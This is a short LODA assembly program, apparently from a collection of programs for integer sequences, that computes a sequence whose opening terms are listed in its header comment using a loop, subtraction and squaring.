; 3,3,2,6,3,11,6,18,11,27,18,38,27,51,38,66,51,83,66,102,83,123,102,146,123,171,146,198,171,227,198,258,227,291,258,326,291,363,326,402,363,443,402,486,443,531,486,578,531,627,578,678,627,731,678,786,731
mov $1,$0
add $0,1
mov $2,$1
lpb $2
sub $0,3
sub $2,1
trn $2,1
lpe
pow $0,2
add $0,2
| 24.785714 | 203 | 0.634006 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.